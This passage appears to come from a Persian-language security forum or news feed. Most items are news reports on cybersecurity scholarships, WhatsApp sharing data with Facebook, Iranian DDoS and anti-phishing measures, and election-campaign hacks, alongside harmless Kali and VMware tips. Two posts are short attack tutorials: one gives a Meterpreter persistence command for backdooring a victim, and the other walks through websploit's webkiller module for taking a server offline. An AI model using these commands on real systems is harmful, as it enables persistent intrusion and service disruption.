  18. درحالی که کمبود کارشناسان امنیت سایبری، به یکی از بزرگ‌ترین چالش‌های شرکت‌های آمریکایی تبدیل شده است، دانشگاه ویرجینیا (Virginia) قصد دارد، به دانشجویان نخبه‌ای که وارد این حوزه می‌شوند، کمک مالی کند. طبق گزارش وبگاه دولت محلی این ایالت، برای هر دانشجوی جدید در این حوزه، مبلغ 1 میلیون دلار در نظر گرفته‌شده است. افرادی که در این برنامه ثبت‌نام کنند، سالانه 20 هزار دلار، برای تحصیل در حوزه‌ی امنیت شبکه‌های رایانه‌ای، امنیت داده و منابع الکترونیک، دریافت خواهند کرد. البته ورود به این برنامه، تعهداتی برای دانشجویان نیز دارد. آن‌ها باید توافق کنند، چندین سال پس از دریافت مدرک خود، با سازمان‌های دولتی این ایالت، همکاری کنند. تاکنون، تنها 25 نفر در این برنامه ثبت‌نام کرده‌اند. شرایط لازم برای ورود به این برنامه، اتمام تحصیل در دو سال آینده و حداقل معدل 3.0 است. در همین راستا، کارن جکسون (Karen Jackson)، وزیر فناوری اطلاعات ایالت ویرجینیا، در آخرین مصاحبه‌ی خود، امنیت سایبری را از ضروری‌ترین مشاغل و عامل بهبود و امنیت دولت در آینده دانست. وی تصریح کرد: «این بورسیه‌ها تضمین می‌کنند، نسل بعدی کارشناسان سایبری، آموزش مناسب دریافت کرده‌ و در آینده‌ی صنعت، تأثیر مثبتی خواهند داشت.»
  19. به گزارش گرداب، فیس بوک از این اطلاعات برای نمایش تبلیغات هدفمند به کاربران خود استفاده می کند،البته این تنها استفاده‌ای نیست که فیس بوک از این حجم از اطلاعات ارزشمند به عمل می آورد. واتس آپ در وبلاگ خود رسما به این موضوع اذغان کرده و آورده است: ما با هماهنگی فیس بوک اقداماتی همچون بررسی میزان استفاده کاربران از خدماتمان و مقابله بهینه با هرزنامه‌ها را هم انجام می‌دهیم. فیس بوک با استفاده از این اطلاعات می تواند دوستان بهتری به کاربران پیشنهاد بدهد و آگهی های مرتبط تری را برای هر فرد به نمایش درآورد، بنا بر این گزارش از این طریق شما تبلیغاتی را از شرکتی که قبلا با آن کار کرده اید مشاهده می‌کنید و نه اگهی های فردی که هرگز در موردش چیزی نشنیده اید. این اطلاعات علاوه بر فیس بوک با تعدادی از شرکت های همکار با این شبکه اجتماعی هم به اشتراک گذارده می‌شود که از جمله آنها می توان به Oculus Rift سازنده هدست های واقعیت مجازی که چندی قبل توسط فیس بوک خریداری شد، اشاره کرد. شماره همراه مورد استفاده برای تایید حساب واتس اپ و آخرین باری که کاربر از واتس آپ استفاده کرده از جمله اطلاعاتی است که به فیس بوک تحویل داده می شود. این اطلاعات در کنار دیگر اطلاعات شخصی کاربران مجموعه ارزشمندی از داده ها را برای شرکتی مانند فیس بوک آشکار می کند.
  20. به گزارش گرداب؛ اسماعیل رادکانی، معاون بهره برداری و مدیریت شبکه شرکت ارتباطات زیرساخت، در تشریح این پروژه ها اظهار داشت: اجرای دو ماژول «دیداس پروتکشن» و « شناسایی و مقابله با فیشینگ» که در فضای مجازی از جمله حملات سایبری شناخته شده هستند در دستور کار شرکت ارتباطات زیرساخت قرار گرفته است. وی گفت: حملات دیداس به حملاتی گفته می شود که با ارسال حجم ترافیک زیاد به سمت یک سایت و یا سرور مدنظر، عملکرد سایت را مختل می کند و سرور مورد هدف، دیگر نمی تواند فعالیت خود را ادامه دهد. رادکانی با اشاره به اینکه این نوع حملات سایبری ممکن است برای هر نوع سایتی که تعاملی و یا خدماتی باشد و مردم به آن مراجعه می کنند اتفاق بیافتد، خاطرنشان کرد: یکی از اهداف شبکه ملی اطلاعات این است که بخش عمده ای از ترافیک ارتباطی در داخل کشور به سهولت انجام شود به نحوی که علاوه بر تولید محتوا، میزبانی سایتها و سرورها نیز در داخل صورت گیرد. وی ادامه داد: براین اساس چنانچه حجم زیادی از ترافیک ارتباطی در داخل کشور، تبادل شود، باید سرورهایی که این خدمات را در داخل کشور ارائه می دهند امنیتشان تضمین شود و نباید عملکرد سرورهای داخلی با حملاتی از جنس دیداس دچار اختلال شود. چرا که حملاتی از جنس دیداس بخشی از پهنای باند بین الملل را اشغال و عملکرد سایتها را مختل می کند. معاون شرکت ارتباطات زیرساخت تاکید کرد: براین اساس یکی از اقدامات برای تضمین امنیت شبکه ملی اطلاعات توسعه مبادی ورودی و خروجی کشور از یک نقطه به چند نقطه بوده است. این افزایش تعداد نقاط سبب می شود اگر در یک مسیر مشکلی ایجاد شد، ترافیک از مسیرهای دیگر جایگزین شود. وی ادامه داد: در همین حال اقدام بعدی صورت گرفته ایجاد سیستم «دیداس پروتکشن» است که جلوی این حملات از مبدا ورودی به سمت کشور گرفته شود. به این ترتیب سایتهایی که مورد هدف دیداس قرار می گیرند از این حملات مصون خواهند ماند. این راهکار عمده مشکلات را حل خواهد کرد و ارائه یک سرویس روی شبکه ملی اطلاعات بدون اختلال در عملکرد اتفاق می افتد و جلوی تهدیدات گرفته می شود. رادکانی، ماژول دیگر بکارگرفته شده برای تضمین امنیت شبکه ملی اطلاعات را مقابله با حملات فیشینگ (صفحات جعلی) عنوان کرد و به مهر گفت: یکی از اهداف مدنظر شبکه ملی اطلاعات تسهیل و امن سازی فضای کسب و کار برای مردم است و در این جهت باید شرایطی فراهم شود که مردم بتوانند به راحتی در این فضا تراکنش مالی و بانکی انجام دهند. این مقام مسئول در شرکت ارتباطات زیرساخت با تاکید براینکه باید سیستم به نحوی باشد که کاربران برای تراکنش اطمینان حاصل کنند که صفحات سایت و درگاهی که به آن وارد می شوند جعلی نیست، تصریح کرد: مدیریت اینگونه حملات و تهدیدات در دستور کار قرار گرفته است تا جلوی ایجاد اینگونه صفحات جعلی گرفته و شناسایی شود. وی با بیان اینکه در این راستا فضای کسب و کار بر بستر شبکه ملی اطلاعات امن تر خواهد شد، ادامه داد: ماژول دیداس پروتکشن هم اکنون در مبادی ورودی ارتباطی کشور به کار گرفته شده است و راهکار مقابله با فیشینگ نیز مراحل تکمیلی را می گذراند. به گزارش مهر، شبکه ملی اطلاعات در فاز نخست قرار است اوایل هفته جاری رونمایی شود.
  21. سلام و درود بر شما. امروز میخوام اموزش ساخت بک دور برای ورود دوباره به سیستم هک شده بعد از گرفتن دسترسی Meterpreter را یاد بدم. خب برای این کار ابتدا شما باید یک سیستم هک کنید تا بتونید دسترسی Meterpreter را بگیرید سپس در Meterpreter دستور زیر را تایپ کنید. run persistence -U -A 10-8090 -r Target IP به جای Target IP ایپی سیستم هک شده ( قربانی ) را وارد کنید. لذت ببرید!
  22. با سلام و درود فروان بر شما یکی از دوستان اومدن خصوصی منو به بنده پیام داد که زمانی که میخواهد در محیط VMware Workstation کالی لینوکس ( یا هر سیستم عامل دیگری ) را اجرا کند با این ارور مواجه می شود. پس اگر شما هم چنین مشکلی را دارید، با ما همراه باشید. ____________________________________________________________________ 1. ابتدا Run را باز کنید. ( میتوانید از کلید هالی ترکیبی Win+R استفاده کنید و یا اینکه در استارت سرچ کنید Run ). 2.سپس در محیط ران تایپ کنید Services.msc و اینتر را بزنید. 3.در محیط سرویس ها به دنبال VMware Authorization Service بگردید. 4.بر روی VMware Authorization Service کلیک راست کنید و گزینه Start را بزنید. کمی صبر کنید. سپس وارد VMware Workstation شوید و کالی لینوکس ( یا هر سیستم عامل دیگری که دوست داشتید ) را اجرا کنید و لذت ببرید. تشکر فراموش نشه
  23. با سلام و درود امروز میخوام اموزش دیداس یا همون حمله به سرور با کالی رو یاد بدم. خیلی سادست. خب اول ببینم دیداس زدن اصلا چیه: ی توضیح ساده میدم. به فرستادن یک پیام به تعداد بسیار زیاد و پشت سر هم به سرور که باعث هنگ کردن و سپس از کار افتادن سرور ( موقتی، دائمی ) دیداس زدن میگویند. ی چیزی تو مایه های اسپم هست ولی اینبار به سرور. خب اموزش: ابتدا ترمینال را باز کنید. سپس دستور زیر راوارد کنید و اینتر را بزنید: websploit سپس وب اسپلویت اجرا میشود. سپس دستور: use network/webkiller را بزنید و اینتر را بزنید. سپس باید تارگت خودتون رو برای دیداس ست کنید. از دستور زیر استفاده کنید: set TARGET [Hidden Content] به جای جمله قرمز رنگ، تارگتتون رو وارد کنید. اینتر را بزنید. در اخر با زدن دستور: run عملیات دیداس اغاز میشود. لذت ببرید! تشکر فراموش نشه
  24. سلام و درود امروز میخوام بهتون یاد بدم که در صورتی که مایل به تعویض پسورد خود در کالی لینوکس بودید، به راحتی پسورد خود را عوض کنید. خب ابتدا ترمینال را باز کنید. سپس تایپ کنید: passwd سپس اینتر را بزنید. با پیغام Enter new UNIX password: مواجه می شوید. سپس پسورد جدیدی که میخواهید را وارد کنید. ( در کالی لینوکس زمانی که پسورد را تایپ میکنید، هیچ کاراکتری نمایش داده نمیشود و شما پسورد را مشاهده نمیکنید ولی پسورد وارد شده است پس با دقت وارد کنید. ) سپس با پیغام Retype new UNIX password: مواجه میشوید. در اینجا باید دوباره پسورد جدیدی را که در مرحله قبل وارد کردید وارد کنید. سپس زمانی که با پیغام passwd: password updated successfully مواجه شدید یعنی پسورد با موفقیت تغییر پیدا کرد! موفق باشید. تشکر نشانه رضایت شماست
  25. هکرها سیستم‌های رایانه‌ای ستاد انتخاباتی «دونالد ترامپ» نامزد جمهوری‌خواه آمریکا و سازمان‌های وابسته به جمهوری‌خواهان را هدف حملات سایبری خود قراردادند. طبق اظهارات یکی از کارکنان ستاد انتخاباتی ترامپ و یک کارشناس امنیتی، پست الکترونیک یکی از اعضای این ستاد انتخاباتی در سال ۲۰۱۵ به یک بدافزار آلوده شد و از این طریق ایمیل‌های مغرضانه‌ای به همکاران وی ارسال شد. در آن زمان مشخص نبود که آیا هکرها به رایانه‌های این ستاد انتخاباتی دسترسی پیداکرده‌اند یا خیر. این در حالی است که ماه گذشته، مقامات امنیتی آمریکا از نفوذ هکرها به رایانه‌های کمیته ملی حزب دموکرات و ستاد انتخاباتی هیلاری کلینتون خبر دادند. مقامات آمریکا اعلام کردند که طبق بررسی‌های صورت گرفته روسیه و نایبان آن مسئول این حملات سایبری هستند؛ اما مقامات کرملین با رد این اتهامات، آن‌ها را «ادعاهایی پوچ» خواند. شایان‌ذکر است که ابزار و تکنیک‌های مورداستفاده برای هک کردن سیستم‌های رایانه‌ای این نامزد جمهوری‌خواه مشابه ابزار و تکنیک‌های بکار رفته در حمله سایبری به سازمان‌های وابسته به حزب دموکرات ازجمله کمیته ملی حزب دموکرات و ستاد انتخاباتی کلینتون است. این امر مقامات آمریکایی را به این ارزیابی اولیه رهنمون ساخت که آژانس‌های اطلاعاتی غیرنظامی و نظامی روسیه و نایبان آن هر دو حزب سیاسی آمریکا را هدف قرار داده
×
×
  • ایجاد مورد جدید...